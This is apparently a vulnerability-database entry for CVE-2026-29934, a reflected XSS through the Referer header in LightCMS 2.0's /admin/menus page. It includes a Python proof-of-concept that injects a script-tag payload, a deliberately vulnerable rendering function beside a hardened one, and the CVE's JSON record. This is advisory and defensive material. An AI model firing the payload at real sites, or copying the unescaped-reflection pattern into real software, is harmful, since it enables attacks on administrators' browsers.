Security Vulnerability Report
CVE-2026-29934 CVSS 6.1 MEDIUM

Published: 2026-03-26 15:16:36
Last Modified: 2026-05-10 14:16:49

Description

A reflected cross-site scripting (XSS) vulnerability in the /admin/menus component of Lightcms v2.0 allows attackers to execute arbitrary JavaScript in the context of the victim's browser by supplying a crafted value in the Referer request header, which the page reflects into its response without encoding.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:lightcms_project:lightcms:2.0:*:*:*:*:*:*:* - VULNERABLE
Lightcms 2.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# Target URL containing the vulnerable component
target_url = "http://target-host.com/admin/menus"

# Malicious JavaScript payload to be injected via the Referer header
xss_payload = "<script>alert('CVE-2026-29934_XSS');</script>"

# Prepare headers with the injected payload
headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) PoC-Scanner",
    "Referer": xss_payload,
}

try:
    # Send the GET request to the vulnerable endpoint
    response = requests.get(target_url, headers=headers, timeout=10)

    # Check if the payload is reflected unfiltered in the response body
    # (a literal substring match: an HTML-encoded reflection will not match)
    if xss_payload in response.text:
        print("[+] Vulnerability Confirmed: The payload was reflected in the response.")
    else:
        print("[-] Vulnerability Not Detected: Payload not found or encoded.")
except requests.exceptions.RequestException as e:
    print(f"[!] Error connecting to target: {e}")
```
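The following block is an added illustration, not code from LightCMS or from the issue reporter. LightCMS is a PHP application; this Python model only shows the pattern behind the finding: the Referer header value is concatenated into the HTML response (`render_vulnerable`), the hardened form validates it as a same-origin http(s) URL and HTML-escapes it before use (`render_hardened`), and `reflection_state` refines the PoC's single substring check by telling a raw (exploitable) reflection apart from an encoded one. The function names, the "Back" link, the host `target-host.com` and the sample payloads are assumptions made for the example.

```python
import html
from urllib.parse import urlsplit

# Constructed sample Referer value with the same shape as the PoC payload.
PAYLOAD = "<script>alert('CVE-2026-29934_XSS');</script>"


def render_vulnerable(referer: str) -> str:
    """Model of the vulnerable pattern (hypothetical admin 'Back' link):
    the Referer header is written into the HTML response unescaped."""
    return f'<a href="{referer}">Back</a>'


def render_hardened(referer: str, allowed_host: str) -> str:
    """Hardened form: only accept a same-origin http(s) URL, HTML-escape it
    (quotes included, since it lands in an attribute), otherwise fall back
    to a fixed safe path instead of echoing attacker-controlled input."""
    parts = urlsplit(referer)
    if parts.scheme in ("http", "https") and parts.netloc == allowed_host:
        href = html.escape(referer, quote=True)
    else:
        href = "/admin"  # assumed safe default for this example
    return f'<a href="{href}">Back</a>'


def reflection_state(body: str, payload: str) -> str:
    """Classify how a payload appears in a response body:
    'raw'     -> reflected unescaped (the condition the PoC reports on)
    'escaped' -> reflected, but HTML-encoded (not exploitable as markup)
    'absent'  -> not reflected at all (e.g. dropped or replaced)."""
    if payload in body:
        return "raw"
    if (html.escape(payload, quote=True) in body
            or html.escape(payload, quote=False) in body):
        return "escaped"
    return "absent"


if __name__ == "__main__":
    host = "target-host.com"
    # Payload that breaks out of the href attribute on a same-origin URL.
    attr_payload = 'http://target-host.com/admin/menus?q="><script>alert(1)</script>'
    for name, value in (("script tag", PAYLOAD), ("attribute breakout", attr_payload)):
        print(f"{name}: vulnerable={reflection_state(render_vulnerable(value), value)}, "
              f"hardened={reflection_state(render_hardened(value, host), value)}")
```

Two caveats when using the PoC above against a real target. First, the script sets the Referer header directly with a non-browser client; in a browser the header is derived from the referring page's URL, so a victim-side exploit needs the victim to arrive from an attacker-controlled URL carrying the payload, and the default referrer policy in current browsers (strict-origin-when-cross-origin) sends only the origin on cross-origin navigations, which is why the vector carries UI:R. Second, a literal substring check only proves the raw case; if the server encodes the value the PoC reports "not detected" even though the header is still being reflected, which `reflection_state` reports as `escaped`.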

References

https://github.com/eddy8/LightCMS/issues/38 (Exploit, Issue Tracking, Mitigation)
Raw JSON Data

```json
{"cve": {"id": "CVE-2026-29934", "sourceIdentifier": "[email protected]", "published": "2026-03-26T15:16:36.017", "lastModified": "2026-05-10T14:16:49.260", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A reflected cross-site scripting (XSS) vulnerability in the /admin/menus component of Lightcms v2.0 allows attackers to execute arbitrary Javascript in the context of the user's browser via modifying the referer value in the request header."}, {"lang": "es", "value": "Una vulnerabilidad de cross-site scripting (XSS) reflejada en el componente /admin/menus de Lightcms v2.0 permite a los atacantes ejecutar Javascript arbitrario en el contexto del navegador del usuario mediante la modificación del valor del referer en la cabecera de la solicitud."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:lightcms_project:lightcms:2.0:*:*:*:*:*:*:*", "matchCriteriaId": "188FCA72-D81E-48AA-8C49-58CB4BCD877F"}]}]}], "references": [{"url": "https://github.com/eddy8/LightCMS/issues/38", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Mitigation"]}]}}
```